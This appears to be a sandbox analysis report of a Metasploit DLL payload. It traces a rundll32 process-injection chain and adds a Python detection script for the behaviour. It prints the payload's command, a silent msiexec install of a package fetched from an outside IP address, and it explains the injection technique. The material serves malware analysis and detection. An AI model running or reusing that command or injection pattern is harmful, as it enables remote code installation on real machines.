Analysis

- Max time kernel: 46s
- Max time network: 43s
- Platform: windows7_x64
- Resource: win7-20220414-en
- Submitted: 03-06-2022 13:58
Tasks

- Static task: static1
- Behavioral task: behavioral1
  Sample: 12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll
  Resource: win7-20220414-en
- Behavioral task: behavioral2
  Sample: 12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll
  Resource: win10v2004-20220414-en
General

- Target: 12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll
- Size: 5KB
- MD5: d9337ff3c22d2a4258890fd38c5e7d7f
- SHA1: 6dae55e6a58b612fedb42ebb73a77f9c4b932e27
- SHA256: 12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5
- SHA512: 166d9dd0c11cc8d685868e976014938d1abfbb087485324f720b76002e44250309e618622461b6203ea6470dedec62002bea3bda32f4ebf7ef385c78327315ac
Malware Config

- Extracted family: metasploit
- Payload: windows/single_exec

A single-stage "exec" payload runs one command and exits; the command is not shown in the extracted config here, but the process tree below shows what it was: the injected rundll32.exe (PID 760) spawns msiexec with a remote package URL.
Signatures

- MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

- Blocklisted process makes network request (1 IoC)
  flow | pid  | process
  3    | 2016 | msiexec.exe

- Use of msiexec (install) with remote resource (1 IoC)
  pid  | process
  2028 | msiexec.exe

- Suspicious use of SetThreadContext (1 IoC)
  description                        | pid | process      | target process
  PID 616 set thread context of 760  | 616 | rundll32.exe | rundll32.exe

- Suspicious use of AdjustPrivilegeToken (34 IoCs)
  Privileges enabled via AdjustTokenPrivileges, in the order recorded:
  msiexec.exe PID 2028 (31 entries): SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
  msiexec.exe PID 2016 (3 entries): SeRestorePrivilege, SeTakeOwnershipPrivilege, SeSecurityPrivilege
  The client msiexec.exe (PID 2028) attempts to enable essentially every privilege in its token at startup; the three for PID 2016 belong to the Windows Installer service instance. Neither list by itself indicates the payload did anything beyond invoking msiexec.

- Suspicious use of WriteProcessMemory (22 IoCs)
  description                        | count | pid  | process      | target process
  PID 1704 wrote to memory of 616    | 7     | 1704 | rundll32.exe | rundll32.exe
  PID 616 wrote to memory of 760     | 8     | 616  | rundll32.exe | rundll32.exe
  PID 760 wrote to memory of 2028    | 7     | 760  | rundll32.exe | msiexec.exe
  Writes from a parent into a child it has just created are expected during process creation (the loader populates the child's process parameters), so the 1704 -> 616 and 760 -> 2028 entries are not by themselves suspicious. The 616 -> 760 writes are the ones that matter: they are paired with the SetThreadContext call on the same target, which is the classic write-payload-then-redirect-thread injection sequence.
Processes

PIDs are taken from the signature tables above (WriteProcessMemory chain 1704 -> 616 -> 760 -> 2028; SetThreadContext 616 -> 760; network flow from 2016).

1. C:\Windows\system32\rundll32.exe (PID 1704)
   rundll32.exe C:\Users\Admin\AppData\Local\Temp\12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll,#1
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\rundll32.exe (PID 616)
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll,#1
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\rundll32.exe (PID 760)
         rundll32.exe
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\SysWOW64\msiexec.exe (PID 2028)
            msiexec /i http://23.227.200.242:2650/hbYDuh9tfbBfVYg7up.jpg /q
            - Use of msiexec (install) with remote resource
            - Suspicious use of AdjustPrivilegeToken

1. C:\Windows\system32\msiexec.exe (PID 2016)
   C:\Windows\system32\msiexec.exe /V
   - Blocklisted process makes network request
   - Suspicious use of AdjustPrivilegeToken

Reading the chain: the sandbox loads the DLL through the 64-bit rundll32.exe with export ordinal #1; because the DLL is 32-bit, rundll32 relaunches its SysWOW64 counterpart (PID 616) with the same arguments. That 32-bit instance starts a bare rundll32.exe (PID 760, no DLL argument), writes into it and re-points its thread with SetThreadContext, so PID 760 is the process that actually executes the Metasploit payload. The payload's single command is the msiexec line: /i installs a package, /q suppresses all UI, and the package is fetched over HTTP from 23.227.200.242:2650. The .jpg extension is cosmetic; msiexec identifies a package by its contents, not its name. The client msiexec (PID 2028) hands the job to the Windows Installer service instance (PID 2016, started with /V), which is why the network request is attributed to 2016 rather than 2028.
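The two behaviours that make this tree detectable on a normal endpoint are a rundll32 child with no DLL argument (the injection host) and msiexec being pointed at a URL. The following is an added example, not code from the sandbox report: it reconstructs the report's process-creation events as constructed sample data (PIDs from the tables above; the parent PIDs 1000 and 500 and the event field layout are assumptions) and runs both detections plus a lineage walk over them.

```python
"""Detections for the rundll32 -> rundll32 -> msiexec chain in the process tree above.

Added example, not code from the sandbox report: the process-creation events
below are constructed from the report's process tree and signature tables
(PIDs 1704, 616, 760, 2028, 2016). The parent PIDs 1000 and 500 and the event
field layout are assumptions; map them onto your own telemetry (e.g. Sysmon
event ID 1: Image, ParentProcessId, CommandLine).
"""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path as logged
    cmdline: str    # command line as logged


SAMPLE_DLL = (r"C:\Users\Admin\AppData\Local\Temp"
              r"\12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll")

# Constructed from the report's process tree; parents 1000 and 500 are assumed.
EVENTS = [
    ProcEvent(1704, 1000, r"C:\Windows\system32\rundll32.exe", f"rundll32.exe {SAMPLE_DLL},#1"),
    ProcEvent(616, 1704, r"C:\Windows\SysWOW64\rundll32.exe", f"rundll32.exe {SAMPLE_DLL},#1"),
    ProcEvent(760, 616, r"C:\Windows\SysWOW64\rundll32.exe", "rundll32.exe"),
    ProcEvent(2028, 760, r"C:\Windows\SysWOW64\msiexec.exe",
              "msiexec /i http://23.227.200.242:2650/hbYDuh9tfbBfVYg7up.jpg /q"),
    ProcEvent(2016, 500, r"C:\Windows\system32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V"),
]

_ARG_RE = re.compile(r'"[^"]*"|\S+')
_REMOTE_RE = re.compile(r"^(https?://|ftp://|\\\\)", re.IGNORECASE)     # URL or UNC path
_INSTALL_SWITCHES = {"/i", "-i", "/package", "-package", "/a", "-a"}    # install / admin install
_QUIET_RE = re.compile(r"^[/-](q(n|b|r|f)?|quiet|passive)$", re.IGNORECASE)


def split_args(cmdline: str) -> list[str]:
    """Tokenise a Windows command line, keeping quoted paths as one token."""
    return [t.strip('"') for t in _ARG_RE.findall(cmdline)]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def remote_msi_install(ev: ProcEvent) -> Optional[dict]:
    """msiexec told to install a package from a URL or UNC path (ATT&CK T1218.007).

    Returns the URL, whether the install is silent, and the parent PID; None
    when the event is not a remote install.
    """
    if basename(ev.image) != "msiexec.exe":
        return None
    args = split_args(ev.cmdline)[1:]          # drop the image token
    for i, a in enumerate(args[:-1]):
        if a.lower() in _INSTALL_SWITCHES and _REMOTE_RE.match(args[i + 1]):
            return {"pid": ev.pid, "ppid": ev.ppid, "url": args[i + 1],
                    "quiet": any(_QUIET_RE.match(x) for x in args)}
    return None


def hollowed_rundll32(events: list[ProcEvent]) -> list[int]:
    """rundll32 spawned by rundll32 with no DLL/export argument.

    A bare child is the empty host the parent then writes to and re-points with
    SetThreadContext (the 616 -> 760 pattern in the report). A rundll32 child
    that carries its own "dll,export" argument, such as the 64-bit -> 32-bit
    relaunch 1704 -> 616, is not flagged.
    """
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if (basename(e.image) == "rundll32.exe" and parent is not None
                and basename(parent.image) == "rundll32.exe"
                and len(split_args(e.cmdline)) <= 1):
            hits.append(e.pid)
    return hits


def lineage(events: list[ProcEvent], pid: int) -> list[str]:
    """Walk ppid links back to the first known ancestor, root first."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        e = by_pid[pid]
        chain.append(f"{basename(e.image)}({e.pid})")
        pid = e.ppid
    return chain[::-1]


if __name__ == "__main__":
    for ev in EVENTS:
        hit = remote_msi_install(ev)
        if hit:
            print("remote MSI install:", hit)
            print("  lineage:", " -> ".join(lineage(EVENTS, ev.pid)))
    print("hollowed rundll32 candidates:", hollowed_rundll32(EVENTS))
```

The remote-install check keys on the switch/argument pair rather than on "http" anywhere in the line, so a local package whose name merely contains a URL-like string is not flagged, and UNC paths are caught along with HTTP. The hollowing check deliberately does not fire on the 64-bit to 32-bit relaunch, which is legitimate rundll32 behaviour; only the argument-less child is reported.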
Network
MITRE ATT&CK Matrix
Downloads

- memory/616-54-0x0000000000000000-mapping.dmp
- memory/616-55-0x00000000755B1000-0x00000000755B3000-memory.dmp (8KB)
- memory/760-56-0x000000000048178C-mapping.dmp
- memory/2016-60-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmp (8KB)
- memory/2028-58-0x0000000000000000-mapping.dmp

The PID 760 mapping at 0x0000000000048178C is the one to start with when triaging the injected code, since 760 is the SetThreadContext target.